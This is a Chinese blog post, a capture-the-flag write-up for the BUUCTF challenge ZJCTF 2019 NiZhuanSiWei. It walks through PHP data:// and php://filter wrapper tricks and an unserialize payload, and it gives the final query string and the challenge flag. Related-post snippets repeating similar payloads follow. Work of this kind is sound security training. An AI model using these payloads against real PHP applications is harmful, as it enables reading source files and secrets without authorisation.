web buuctf [ZJCTF 2019]NiZhuanSiWei1

最新推荐文章于 2022-04-23 16:02:18 发布
最新推荐文章于 2022-04-23 16:02:18 发布
阅读量1.2k 收藏 2
点赞数
文章标签: php 安全 php伪协议 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123487514
版权

一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 ,

php伪协议是基于文件包含的,文件包含有本地包含和远程包含,

当包含的文件在远程服务器上时,就形成了远程文件包含。

远程文件包含需要在 php.ini 中设置:

allow_url_include = on(是否允许 include/require 远程文件)
allow_url_fopen = on(是否允许打开远程文件)

php伪协议是php支持的协议和封装协议

贴(我从微博里找的,大致内容都有写):

1.条件 file_get_contents($text,'r')==="welcome to the zjctf",

利用在线base4编码工具对welcome to the zjctf进行编码,得到

利用data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

2. 

if里的正则匹配表示file和flag有关系,include()是在php里面调用php文件,从注释里可以看出来调用的是useless.php,根据下面的代码,需要看到useless.php,于是令

file=php://filter/read=convert.base64-encode/resource=useless.php 

(不用这个伪协议,useless.php文件直接运行,不会有返回源码,使用伪协议会将源码进行返回)

将下面的base64解码,得到


class Flag{ //flag.php
public $file;
public function __tostring()
  {
    if(isset($this->file))
      {echo file_get_contents($this->file);
       echo "<br>";
       return ("U R SO CLOSE !///COME ON PLZ");
      }
  }
} 
?>

 3.引用的FLAG类,根据注释flag.php,里面的文件是flag.php,我们还需要知道password的值是什么,根据后面的代码,password应该是序列化后的值,这个是就是Flag类下的flag.php,于是序列化后为O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}这就是password的值

4.构造payload:

text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";},进入界面查看源码,可以得到flag

flag{c77bdfc1-8a0f-4ce8-950a-4cdf2f97046d}

半杯雨水敬过客
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
魔术方法总结
梦里不知身是客
12-26 9851
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
[ZJCTF 2019]NiZhuanSiWei 1
m0_62879498的博客
04-27 577
[ZJCTF 2019]NiZhuanSiWei 1 进入环境,得到源代码 观察源代码,发现: 我们需要绕过两个点 首先是 get传参 ,让text=welcome to the zjctf 在这里我们需要用到 php的伪协议 data:// data:// — 数据流读写 条件:allow_url_fopen=on;allow_url_include=on 作用:作为一个封装器对进行数据流读写 使用格式:data://text/plain,[code] eg: data://text/plain,
[ZJCTF 2019]NiZhuanSiWei
wuuconix's blog
04-01 238
[ZJCTF 2019]NiZhuanSiWei 这道题所有的考点我都了解过,甚至用来出过类似的题目,但是作者把它们套娃得非常不错,做下来感觉非常有意思! 考点 include 和 file_get_contents 函数的利用以及 php://input 和 php://filter/read=convert.base64-encode/resouce= 伪协议的利用 主界面 <?php $text = $_GET["text"]; $file = $_GET["file"]; $p
BUUCTFweb之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
Xilinx_Vivado_SDK_Web_2019.1_0524_1430_Win64.exe
06-28
下载请注意操作系统! Vivado HLx 2019.1:WebPACK 和版本 —Windows 自解压 Web 安装程序 (EXE - 64.62 MB)
Xilinx_Vivado_SDK_Web_2019.1_0524_1430_Lin64.bin
06-28
下载请注意操作系统! Vivado HLx 2019.1:WebPACK 和版本 — Linux 自解压 Web 安装程序 (BIN - 115.05 MB)
1+X Web前端.zip
10-10
1+X Web前端开发职业技能等级证书 2019年Web前端开发职业技能等级考试试题初级 中级 2019年Web前端开发职业技能等级考试试题高级 2019年Web前端开发职业技能等级考试试题真题 2019年Web前端开发职业技能等级考试...
常用web开发工具 JetBrains PhpStorm 2019.zip
06-30
常用web开发工具 JetBrains PhpStorm 2019.zip常用web开发工具 JetBrains PhpStorm 2019.zip常用web开发工具 JetBrains PhpStorm 2019.zip常用web开发工具 JetBrains PhpStorm 2019.zip常用web开发工具 JetBrains ...
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3290
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
2021-09-01[ZJCTF 2019]NiZhuanSiWei
plant1234的博客
09-07 789
[ZJCTF 2019]NiZhuanSiWei 首先根据连接打开得到一个,PHP源码: 根据源码分析,我们需要GET三个参数分别是:text,file,password 首先需要检查是否对text传一个文件,并且文件内容要是welcome to the zjctf,才能进行下一步 这里涉及到一些PHP为协议: 两个配置 PHP.ini all_url_include在php 5.2以后添加,安全方便的设置(php的默认设置)为: allow_url_fopen=on; 允许url里的封装协议访问文件
[ZJCTF 2019]NiZhuanSiWei 1学习笔记
weixin_45869407的博客
10-12 1347
刚刚做了一下PHP的代码审计,原以为自己能够做出来,果然还是练习不够,看到text就以为直接传参就OK了,结果试了半天不行,看大佬writeup才发现原来要通过PHP伪协议来传参。 首先看到的是text的参数,它使用了file_get_contents()函数,说明就需要传入文件类型的数据,但text是GET,所以这里就要使用伪协议data。 这里对伪协议的描述挺好的 可以从表上看出,data有4种方式,这里我使用/?text=data://text/plain;base64,d2VsY29tZSB0b
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3909
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
[ZJCTF 2019]NiZhuanSiWei1
evil_ming的博客
04-23 269
一看就是代码审计啊。打开useless.php 发现空白就想用base64编码来查看。 用个在线php编码的来序列化 构造payload之后访问源码得到flag text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} over. ...
buuctf web 极客大挑战2019
最新发布
08-24
嗨!对于BUUCTF Web极客大挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值